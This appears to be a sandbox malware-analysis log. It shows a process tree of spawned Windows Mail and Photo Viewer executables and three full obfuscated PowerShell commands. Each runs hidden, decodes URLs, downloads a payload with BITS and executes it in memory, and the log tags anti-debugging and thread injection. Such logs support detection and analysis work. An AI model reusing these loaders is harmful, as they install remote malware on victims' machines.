C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:5496

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:908

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:620

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:4600

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:5932

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:2172

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:4648

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:4880

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:3856

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:752

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:3036

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:1628

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:636

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:5768

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:1868

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:6056

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:1944

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5972

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5284

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:5640

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:3976

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:2116

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:5032

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:1048

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:1932

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:5444

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
7⤵
PID:4976

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:6092

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:628

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:4908

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:4852

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:1660

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:3332

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:2416

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:5832

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:1372

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:3580

C:\Program Files (x86)\windows mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
7⤵
PID:4832

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:4224

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:2356

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:624

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
PID:4604

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\klmlcf.cmd" "
5⤵
PID:5112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Exotism;++$Exotism;$Exotism=$Exotism-1;Function Cycadophyta ($Acyclically209){$Quadrable=5;$Quadrable++;For($Bakspejlets=5; $Bakspejlets -lt $Acyclically209.Length-1; $Bakspejlets+=$Quadrable){$Cousin199 = 'substring';$Gatter211=$Acyclically209.$Cousin199.Invoke($Bakspejlets, 1);$Forhandlerseminarers=$Forhandlerseminarers+$Gatter211}$Forhandlerseminarers;}$Loddets=Cycadophyta 'mye ahSalictIndretNyskap StoosNondi:Begul/Ma.ki/ UnlewtvingwDelibwBortl.PelsesBesejeTegl n UndedJumarsKafnapGevrsaSkruecIncaneUdbyt.CalcicDiauloCa,uem.asse/Semirp .evarCulexo.psig/Hy,erd CopylIndhu/Trick1Unwil8FricabForkvvLivsf2 ,chac Hegn ';$Drmmebillederne=$Loddets.split([char]62);$Loddets=$Drmmebillederne[0];$bejabbers=Cycadophyta ' SvariFreakeAztekxForfa ';$Fogyish = Cycadophyta ' Tegn\steresMicroy GuldsSendewSu meoStolpw Piro6,refl4 Read\Kri,kWbismaiBarnynRibbedtubifounluswTettysAleucPOpstyoProspw Kan eArbitr No.tSRegnbhHar.eePrdikl ,inalOpsla\ HomovAlkal1heart. Halv0Endom\stooppA,tsfoAleikw Pro,eD sunrCamphsSamfuhMechaeCityllEjbyslPost..Ody.seK.narxBiotiehavre ';.($bejabbers) (Cycadophyta ' Glam$ drueTChiffr.onenaFlagrnTillus AnkepApidaaPredirAdineeGenernHo,dacNonaseStatu=Kli.p$medleeBucklnVeletvMaski:Chiefw UniviApp.nnCredidPseudiOutkirVlg.n ') ;.($bejabbers) (Cycadophyta 'Bu.de$ FortF DrejoOsteogB ultyBritaiRomansFr,nch Bars=I.fer$PadroTUdv rr Baptascu.pn,nmarsSkraap,outoaAdderrTranseTomlen CoencKol oeReman+ Urop$ QuinF .krpoVitregKargoyin koihetersUdfrdhSy sy ') ;.($bejabbers) (Cycadophyta 'Emned$statuLEarldyTypeen nanikS.nkerDowd iHarelg m nieUdsulsBirkh sixth=Skibs Dab l(Rejse( OxidgU.trywPapilm ,dopiBands nitrow.uprei UdkrnSkr.s3Fordu2 Nona_Wo shp NoncrEkstroCrosscNegereHistos Led s Tr,n Dodoi-Ku,ulF Udbo De erPSlgerrSpredo attocBrevoeljests RegesRoshiIRummidElsiz=Beech$ asso{biliaPStrmlISnkniDUlykk}Pamfi) Best. FlygCB.cksoGuldbm PizzmfireraParannIlasrdBerriLSpic,iJomfrnOrdneecompe)dem,n Archi- onnasUdrinp,anktlDingliAssevtDisag Circ,[ ,nticKa.lihB,gliaStrk r Ddfd] ordc3Till,4Regua ');.($bejabbers) (Cycadophyta 'Sandl$Reg,lEHu.oukAtombsNonu.pSupereUntopdVanskiDagsktCib,rrPropreForskrInaccsM lfe Semi,=D.nta Sousa$PersoLParchyforsknVaabekSkrivr,xperiSkue.g.ladheBelyssBluis[Drops$ PostLHedebySchwunSaicekZobobrSiouxiTwentgPriz e rapps harm.L.oincL,keroGranuuGe,ernOmredtkalku-Saudi2 dspr]Skien ');.($bejabbers) (Cycadophyta ' Cons$ CashFOratiaAfdral,umanlBokmaiMe.slt ,otob,oeseoRefulePott rLintsnSubtyeFrontsTudeg=Alter( WrapTStud,eSynlisPaleotJung,-AfpluP Sr raProa.tIncomhOdife .ugt$f,yseFBrolgoTantagSpyssy .rgoi ,urbsF erdhJern )Gra.e To tu- KloaAF.rlinemboddFi hu Snrkl( P,ar[ DogfIMesennAn.pltCoupePUnmolt Tr,arGodtg] Kape:Techi:O,tsws Desmi IntezSkjore Me r Vildt-Appele.nderq Afsk Lystf8Spig,)Philo ') ;if ($Fallitboernes) {.$Fogyish $Ekspeditrers;} else {;$Rationen=Cycadophyta 'ResusS BladtBedazaRgtppr AffrtBall,-BehelBUnaphihvalrtOmlass N okTIdeporCarp,aOuchin FakusDiso.f,immueRadrerHjemm neuro-IntroS rescoGazp,u,spherDrsprcFinaneMazie R ppo$Wrig,LAssigoPentadRankedFi,keeT ngetBgehjs Tryk Dete,- SaarD,lyvee GransAstert StigiTrucknV.kstamic lt M,toi ZamaoOttomn S ph Basin$HusasT DernrEpt.ta B.rln SmaasRen,ep Rin.aUnentrExploeHje fnAnslaccoregeAckno ';.($bejabbers) (Cycadophyta 'Tykka$ lymTCigarrPetura MiddnVis.us.nartpChubbaHjreprDo lee AstunSnuffc.ncone Idan=Panak$.tifteParafnSkovbvA ern: Ab,taErherpA slupBalded Misaa Ker.tF rmaaDecen ') ;.($bejabbers) (Cycadophyta ' Tid,ITu,edmPantepPorteoSuperrV,rist,aste-S rppMSede,oSignadTilsmuW.enelTubereZaiba Mil eBPetaliGlobatGe,ensAgurkTLi,terTilbeaKursenEftersMa,kifintereAadserSamme ') ;$Transparence=$Transparence+'\forskolernes.Spr';while (-not $Lakatoi) {.($bejabbers) (Cycadophyta 'Effer$ Mou LClianafilthkKamala,enertRegiso DiagiAlope=Retar(S.lphT MonteBittesPl.tztLi ho-LoonlPBnkh,a spartLaulah ddan Still$p.rtiT,lsmerRevisaUa.senVenipsStoripPoinsa ,nherFlooreBinion GreycIn.eneBhm.n) Gen. ') ;.($bejabbers) $Rationen;.($bejabbers) (Cycadophyta ' extiS,irgitSnacka E ifr te ttToast- DistSUformlSyl,le M,dseSkuebp.atro Leoni5B.raa ');$Loddets=$Drmmebillederne[$Electrotonises++%$Drmmebillederne.count];}.($bejabbers) (Cycadophyta 'Towns$b rseD tere Ska.hMisdayStripd Kvlnr Ove eKe nerGnaski Ni.kn MagtgPrec eEncr,rSt,vfn NabueSelvo Wrigg=Empei Dis,uG Mi,eeCataptIntel-gendbCformao SulpnAvi st.ktorePostfnChebetJuste Curfe$In.tiTCrumprdrkl,a Sheenforhas L,ndpbronkaBrndsrOncoseTreasnSnittc Whope Co r ');.($bejabbers) (Cycadophyta 'Rilie$,usuiGkommulDruknyH,mulcMan iy Wampp Tresh InheyforsrlSyncolCl.tuiInuncn,etro O gng=Unsta Nerei[HydraStilkny .tems UnhetDsenfeMisdemTabel.FrderCVcsi,o Uh,rnConcovTralleRetsmrPhlebt ,ist] Forv:Istte:FoiblFOvercrS.andoSaucempar,fBparreaPrimasvrdsteretsh6Benhi4WindbSBlanqtAc lirKel.hiHo,elnacid gdatol(Sorro$BanquD,ynkreNeo shVaadeyTumbldMarrorPopuleStvfnrTerb.i oolnTilvegTandpeAabenr ExcenNaturefuldb)Citha ');.($bejabbers) (Cycadophyta ' Over$CornuT,onomhU,hulrSevenefre ls Wateh Late Perr=Udplu Kooki[ SprrS Reb,yTranssSabbatCerate AlummDeli,.rati TTatteeSayidxNiveatLatew.TirlsEInp tn BehacUdkigo.ekstdGummeiUnintn,pildgJocos]Cerca:n,ggi:HarmoA GldeSUnverCMicroIIde,tIArtam. IdcgGUnchee EmentForsvS OrthtRecogrCerauiRiv gnB,varg Che,(Totif$KatriG,ariflTrypay TatocMedreyNys apKursihUdkomy Gladl DatelSyncoi SkornExort)Betnk ');.($bejabbers) (Cycadophyta 'Yakok$Gehe RL gede .ecocCompri,tvfrtIndec=Ich.e$HansaTFustihtankvr ,uoreKargosDronnh Konc.Get,esPalatu SkanbCro.ksOverbt askrD.augiZ,ggin Bir.g.ikse(Gi,ne3Aftrk1Bubin0t rti2Undvr7.denl5 Smil,,ilet2Obdur5Fisse5Degen0Thoug2 Val,)Diffe ');.($bejabbers) $Recit;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5324

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cihdpd.cmd" "
5⤵
PID:2880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Tareret;++$Tareret;$Tareret=$Tareret-1;Function focalizations ($Lader){$Regularizes=5;$Regularizes++;For($Faldskrmssoldaten=5; $Faldskrmssoldaten -lt $Lader.Length-1; $Faldskrmssoldaten+=$Regularizes){$Erotogenetic = 'substring';$Aristolochiaceous=$Lader.$Erotogenetic.Invoke($Faldskrmssoldaten, 1);$Bulbose=$Bulbose+$Aristolochiaceous}$Bulbose;}$Skriftbilledet=focalizations 'Ametrh HjlatBrudttShopkpBad,msCela,:Overs/Sur.a/ da bwFina.wSpisew Fi t.sl ngsHydraeMedianElektd,iljus Dr,fp hypea lmanc VerbeOinks.DaghecR,ninoEntocmReakt/FordapacheirRep,eo syl/SavnidRaa glNonp,/Skri,vMyeli9P adrtO.fenzLak,roDemic8 Ordb ';$Planlgningslove=$Skriftbilledet.split([char]62);$Skriftbilledet=$Planlgningslove[0];$Regnvandsbrnds=focalizations 'EvacuiAb ore BeskxKemot ';$Afdramatiseringen = focalizations ' Hobb\ FlgesMerkoyGelnds MilrwNissoo.enefwJaghi6Un.er4habil\LadniW MineiSw wnnBendadVeklaoB malwHildesAmbe,PShlepoSnakkw PanneMetaprForseSS ksahAcutoeSo iclHustelStub,\Ravn vBesl 1Decor.Paras0Algiv\Tailop Doero OphowJuriseTradirIngens Te,eh OvereAdvowl,elpflBifag.I,dpleSynb x LugeeBrugt ';.($Regnvandsbrnds) (focalizations 'platt$TotalHPaleoaRyolfceksdikCopr,sC.ntut .dioaRadicfStvnefMarti= Cass$Ja ane,ispenChil vpar n:HmorrwConceiScantn erskdBe,reiAfklar Floo ') ;.($Regnvandsbrnds) (focalizations ' Subb$KalveA FornflavaldRenegrSubnoaDetaimHaardaConfitLaughiFgtnisHaandeVgtfyrMaa.eiTjenenAcropgS.raae ndinBifag=Pladr$FilmaH Is waMiddecKlippk,elecs ForstpoeciaBrttefHeftefTabif+Warty$InvenA,lenufVindsdWinn rForsia Slutm stroaGlidetB trkiDis,es E.egeGelatr ,odbiuimodn UnlugSoulheFlu,tnEpi,e ') ;.($Regnvandsbrnds) (focalizations 'uniku$P,ematFrowsrLup,maDo kls Pa lkTr cheLongw Over=De,ra .eepe(agros(OversgPraktwS,ttemKrykkiAmboi FrigfwSnopeiOil,in Ove.3 E.it2Ideoo_HoejlpA kasrFolkeo,eighc Homoe Spros.nkonsBacks be,ta-OvernF,acry BournPAgglorKlaptoskabecRedkne Jak,s p.rasFragmIJyde,dStand= Pala$Arryp{ Tnk,PGenocIfusioD Smre}S,ast)Rv gr.NedvrC Byg,ovrtplmDilatm onasaReflen Dia dDeforLSpartiSybarnSha peOvera)Honnr Regia-.nsttsKartopL,spalK lkbiSennetZygoz Mariu[PeiseceugenhSidseaFu.tsrVandu]Kursu3Disen4Forfa ');.($Regnvandsbrnds) (focalizations 'Monst$Afs rsucayavPrelii AbjunLdrepg CajaePerinlTr,ru rkla=Degly Posen$LustftRangerPer.pa camis,ostek BetneEukar[Kurva$ DoortsandsrLnrelaEi essYoghuk Rense .nam.OctoscOptimoAdj,cuNymphnWin,strese,- Viel2Nondi]B vrt ');.($Regnvandsbrnds) (focalizations 'Bolig$H,vedeBete,t Tvi mKr opa Blu.aOverslhypogsGammepNeroieSocianWi sogAttraeT.appn.kanne Effl=Nonli( InacT e,ipeLaskesT ggetBu,ti-ForriPHvidoaNon vt OverhDeka. Kont.$SphygASkndsfSypigdInterrEucaraParalm By,aaAadset K.asiSubocsS rmse,inanr hauli ObstnGadetgBytteeTybalnAndro)Ci tr Sesa- StenASkallnC.pesdBu.an Alsok(Chrom[ PyraIAfkognmtaaltRhodaP Pakvt Tonir Musi]K.til:Straa: od ns DeltiBree,zMon,se A.in Tabel-StruneL.ssiq Furi Vide8Snouc)Srsyn ') ;if ($etmaalspengene) {.$Afdramatiseringen $svingel;} else {;$Forbreddes=focalizations ' AarsSEligetDepara bjerOmgantYokel-ProduB MiliiKastet,ostasFeuchTSquarrBilivaRgfornEventsPeskyfDetaceNonrer.enoc Fo.et-Hin.eS Vs,loStockuStilrrUagtscA.lsdeFo.si Eksis$Sna,sSG.ttekStu,tr Fremi,ymmefhai.atDep,eb Fr ti RatilVar.glShahzeUnde.dS,rmfeRaajotSoma, fervi- SmokD.ekokePointsPropotSchoeiBulnin MiniaBet dtPressiAfsvaoHollon A,in Sph,r$Ta loHSereraLeisucUnneukBachesL,nget UtopaProbofAnterfMetre ';.($Regnvandsbrnds) (focalizations ' .rdn$FalsiHCavoraHyp,gcNeedekFarvesAntagtTotalaCacodfAntipfAffal=Rrhne$ DegueBandsn C lpvGodse:ForsyaSim.lpKretipSt,und OutwaArybatdeed.aTakh. ') ;.($Regnvandsbrnds) (focalizations 'FipskIPhob.mLn itpHnseaoPathorFinant Se.i-AadseMPhilooMichodpap ru.imeolPe,lieAfn.k VldiBNo.kwiCalvit L nvsNordbTKl.ssrAfgivaAdjutnB,gynsCytotf OxygeRaadsr etow ') ;$Hackstaff=$Hackstaff+'\sundhedsfares.Erd';while (-not $Sunup213) {.($Regnvandsbrnds) (focalizations ',esti$Ty.isS FixbuParaln.syncuEneucp .ejl2 Hulk1Retr.3,usse=Taxi (CochlTsvimeeOs.ansFlyt tSeacr-ForinPArchca Orgatp.eilhH tte Ankla$ArbitHInteraAndencKumulk agissUns itGlitta Opf,fAfbryfSeq.s)Luxur ') ;.($Regnvandsbrnds) $Forbreddes;.($Regnvandsbrnds) (focalizations 'Ube,aS PrgttGudesa .tofrUndert Bort-divanSHypotlSp.keeP oczePe,iapTelef emf5Tosse ');$Skriftbilledet=$Planlgningslove[$Boppers++%$Planlgningslove.count];}.($Regnvandsbrnds) (focalizations 'Grupp$Ejef IPinckrFor rr .mbrequoadsMic.oi Gr ilDadleiSkovpe BrnenHa dbc Toxae Priv F.rm=Ek,is OmtviGPotene Luret Touz-,rugtCFotogo .efanAntict,aadee.eticnLettetOryct Fruit$,onopH Th.ba UnlucFontnkNyttesq,adrtTlapaa BlowfS,ovpfVaabe ');.($Regnvandsbrnds) (focalizations 'Hyper$ApparKTi.sta R lel.itneiProgrbenlarrBlgepe.iaberafklieKeweetRelig ,aspi=C.unk ,osat[MilliS Manny pendsHospitTaar.e ,ortmGen i.UnderCDeadpooverenWormiv Gil.eSynchrTatovtSubdi].dsal:Zealo: SterF AnsgrUdmugoMaskim Un,eBChe,ra ChrysFuture Dis 6 Ratt4BasibSHarvetChilorpo,ypiUdslunClanngConvo( Sept$BudgeI.eaberSkoler isseeesdrasaf,roiTeskelAgroni,ovedeM.nocnUropocGrudgeCatfi) ,ika ');.($Regnvandsbrnds) (focalizations ' Fang$Aft,nFUd ntlSy.bie VenoaFluebpAnnaliSlmmetVermi Serie=lione Kat c[BreakSBlaakyKv.sssKanvatMeduseAn,ipmd,sox. VedeTIrrepeDitlexUdspytBosom..elatEJenbrn,idsscCabbaoHorsedOnt liGa manKortlgSeneh]Hoved: Nas :A,olaABalkoSNegliCNeuroIsiameI Noni. bilgGLimfaeParoltSchisSKurvbtArmb rTermii Aeron strg Gnav(Tarte$UnderKJok.saMetacl,dklaiRad,rbJonnyr ac ueBrokerDaedaeSka ntShimm)Bakly ');.($Regnvandsbrnds) (focalizations 'Bushm$GalopD R,ekaRepardDulceeSandelDelikl systswelshedisco=Profe$N npaFTorvelGinn ePolytaPatrop.lideiHa.knt Cele. ForpsSoupeuRigsdb RedosNullst B dmrPilliiFrakonCentagminim( Afte3Lysti1 Degr9Sapro1 Rapp3Anspo8Morge,almon2Kaste5Unvol6 Bili4Gedeh0Sword)Fored ');.($Regnvandsbrnds) $Dadellse;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5408

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gsxckn.bat" "
5⤵
PID:3752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Brmmen;++$Brmmen;$Brmmen=$Brmmen-1;Function Slagsvrds ($Troutman){$Rangspersonens=5;$Rangspersonens++;For($Whodunit=5; $Whodunit -lt $Troutman.Length-1; $Whodunit+=$Rangspersonens){$Tetrakisazo = 'substring';$Endossementers=$Troutman.$Tetrakisazo.Invoke($Whodunit, 1);$Nervesystemer=$Nervesystemer+$Endossementers}$Nervesystemer;}$Frammit=Slagsvrds 'Visagh rdfat Ma otVragrpPargesIndha:Geopo/Cre.a/,lvidkVidn.iKagedsFormaablattn gad,bHammeeSeksttUnnoohEthi.aEhflakMonte. SkjtcToparoStabemMoota/BraroPPlate/Er stMPe,rsiSupers UrbiiRichwn Belef Con oGn,enrCoer.mFlyvee .irmr,orske HammtManeg.GravhhcompuhDetaipFljte ';$Afsvaekkelsen=$Frammit.split([char]62);$Frammit=$Afsvaekkelsen[0];$Ingun=Slagsvrds '.haraiBas.le,loodxpreco ';$Petrolisation = Slagsvrds 'Prein\D.rezsFata,yBardes uaviwOmbudoP.imfwR.sko6 opsp4u,iln\Sa,siW KogeiStiftn Gas,dBesluo.tomawOverfsovervP pkloManudwHvlbneAandrrSe.ioSUv.llhPeneteHokinlFiltel Nons\NonbavD.cim1 Snvr. Prec0.itua\Rim apcheveoKo,suwPeltaeDe,rerGenopsOptakhOb,eceInt,rlIrretlPurlo.UnkineInst,xIndlreRigma ';.($Ingun) (Slagsvrds 'H,ndr$.ispoAbo,usfklonedHa,pnm rtikpsa opeMandotShoos= Gyno$CirceeCyan,nFo,lsvSe.ar:TinfowUlulaiA bejnBiblidforfriBar erW.akn ') ;.($Ingun) (Slagsvrds 'Synli$AmalePIngele avistSa lbrStandoFo stlSa,meipithos,dskraAsthot AstoiVietnoTrabenFrict=Trope$Rep iARdstjfNoncodSepu.mHarddphjsdeeeurhytInhab+ Re o$Ge.grPSquadeGa getPse,drImplioMangelhesteiartilsC,traaSp.lotHertuiSubamoDi,own Stew ') ;.($Ingun) (Slagsvrds 'Alime$ MoniAMilitlPrinctBoolcmellevu SexolPhrasiHeadsg AlipmMaskinEnergdSub.f Zerli=Apoph Fi.ke( ingf(FortigPaat,wincenmGrnlai ,ste MinivwShak iNo denReost3spids2Overf_BromdpSkruerSysteo Al,ocAari.etelersPe,ucsSku b Oplse- SundFHarm, Non,aPBaks.r MadaoKlintcAfskeeTrdems RutssMiserI Imitd Cadr=Bened$Kyath{O.ierPS iatIEpigrD Call} Fi a) jen.AcromCI arioNonnemPi.otm ImpuaLjedenOsiridTehttL AppeimordenBegogeEldor)car i Kust-Snedisa myspBogstl Sandi FashtOpist A,tim[C ocicca.eghHa,deaDiamarEpico].anda3Alarm4Earth ');.($Ingun) (Slagsvrds 'delic$ DeprTFi.mao L,nigYurtsdMonogrSulfaiChogafResvatStykgeBussenSmede Feof=Wlecc Si ic$Def,cAbetool,undetnadvemNonbluHngebluns.aiBeskfgCim.amKandin .recdVirks[heter$ScripAFr.hollinebt Overm algsuVariolS nsui UnpegStttem.pdelnVandfd Rhei. HistcPrincoSheeruPresansoffit Sejr-Bezan2Acetr]Urosc ');.($Ingun) (Slagsvrds 'Badni$HydroALivsvr ytocfKorr,=Audio(GibbeT PhyleMu edsPel,ctA.rac-SperrPMetroaUnmest Fle hKonfl Anteg$ inoPSubmeeBudgetA.etyrdybtroStranlParahiOpti,sTroldaUnmatt,omasiManusoLozennHospi)Tekst Sy,ta- V.naAKurbanS firdE,end Fotok(Harps[JeopaIOve.dn Ch.ntvrvlePQuivetFocalrnovoc]Nonbu:Notat: Dikts.obariW,nksz ,nceeamtsk Neur.-Di,toeLemurq .pej Risen8Colug)C abb ') ;if ($Arf) {.$Petrolisation $Togdriften;} else {;$Forsendelsens=Slagsvrds 'ManneS gorgtBa,chaAfte,rSpildtBille- TeleBViroli Bev,tFirmas C ntTGawgarMejeraBiconnRa iosSagumfG ngie ForerAller Desan- W ulSPter.oMageru WherrPrsencUdvlgeTr.up pag,n$ RetoFStrudrNont.a ConcmT.ovrm rissiFag ltSkole impar- KommDU.dereSmaabsT,toyt Bu hiwool,nM.nodaLeagutNat,riRefusoCourtnForbl Bygni$,nernATe,tefAmatod,glelm.lektp ArcheKontotDrvle ';.($Ingun) (Slagsvrds 'ravio$BelliA GaspfV,ntedAbsenmforvipBortseStodgtRokke= Fisk$ Antie CopanAcc,svS,liv:Discra GletpNordvpOmdb.dUnconaFyrsttDispoaFejeb ') ;.($Ingun) (Slagsvrds 'GravrIFurifm Scorpbrne,oEvelirFundatKonve-BoligMGestioGauffd Tr.suOutfol .imeeEvnem DiselB planifl gttLandhs AbraT Afstr CitaaGrun,nu,excsGestifT.aekeU imir Ti,k ') ;$Afdmpet=$Afdmpet+'\Extraditing.Pup';while (-not $Forbeholdsklausul) {.($Ingun) (Slagsvrds 'Karyo$staphFPyramoBetwir R.fubPrakteTr,ophDaed.oA,venlProaudTveknsJoniskFenialForbea.esuluHagdes Uigeu Datal Feld=Toesh(LejerTPiaroeSubdesBryg tFolke-De,arPTransaverb tsidekh Angm Ynkvr$ ammAFromefBankbdNonpumGrandpHed.neInd,ktTvind)Landb ') ;.($Ingun) $Forsendelsens;.($Ingun) (Slagsvrds 'CapilS HonntdotyaaVibrirRotattMadr,- RenoSAttaclHest efodbaeUndunp Nodd Sti,l5Hydra ');$Frammit=$Afsvaekkelsen[$Sombreroernes++%$Afsvaekkelsen.count];}.($Ingun) (Slagsvrds '.atte$KontaSeuphoo PhariAflbslHae aeKilordBrneb Ottos=Actin FrskoGPostle,uppotFlexi-IansmCForlooBra dnLossetPip,ge pibenSydaftDi ke Spejl$,orudAAndelfSkolidKommimEgenvpMystiePre,nt Rens ');.($Ingun) (Slagsvrds 'Spalt$U,otrEFallitAitk,h KiloeTidsprSuperiSt sua C url ShapiPlantz .umee Myre2Harle3Bogym4Secur Wor,y=Rygst Telet[ T,leSSalamyEstrus DermtPerile statm all.HouseCT rnio A.gonFlexuvseceseBriskrT.lbatParac]habit:bevil: Sp rF AffirUn ngoD,ublmkurc.B UnciaAnasts rndee Ove 6digit4 CorcS CamltGulvmrRat.oiAsseen Sk ag,onvo(uv.sa$ SnecSIraqioSadleiFodpllSvrdseSu.erd Spyf)Shylo ');.($Ingun) (Slagsvrds 'benn $SalarSberkluNau apSupereSa.borfinche ndstxErythqsamfuuSiti iScannspreveiDekortforfletratt Tila.=.edsk Bibli[amoraSjonesy Skr,sYear,tfor rerudekmu,lod.Dio.sTprev,eMandsx.rnettB,tro.Or,anELu tenKa.ppcBoileoSpirid.steoi ChannAtr.uglit e] nrom:Sk de:FunicA HattS.ctacCTotalIinterIVildf.Kl nkG P,asePo,litfacitSIndvitE.gelrSp,wninebulnPhonig phed(Octal$AnelsETillit I gehLderreLy,rerBeskuiPeepeaNedlul Opr.iDeallz d,nseaccru2Co,fi3Sperm4Akeed)symbo ');.($Ingun) (Slagsvrds 'Wakem$ThitsM GhoseUrinotGardihDerivyVall l,elsea.ollichalsneNonmat Ra,ea C.ran FondiOverelStenoiD,rgbd ApoteMenne1Miljf1,ally5Ma.gr=Debat$BaaseS St.fuRaciepFormleBerigrt,rteebanquxen,etqParleuLrkeri O,ohs FersiSharkt margeBugw .T,rpisVelviuCiv,lbPr elsKloset RererUhyreiKr.dtnFerrygMonop(M.ljs3Dalm 2 ,tef8Samme4 Fo,s4S,rha9Tuske,Dokum2Geni.5Bereg9Brnde7 Poli3 Ju t)rangf ');.($Ingun) 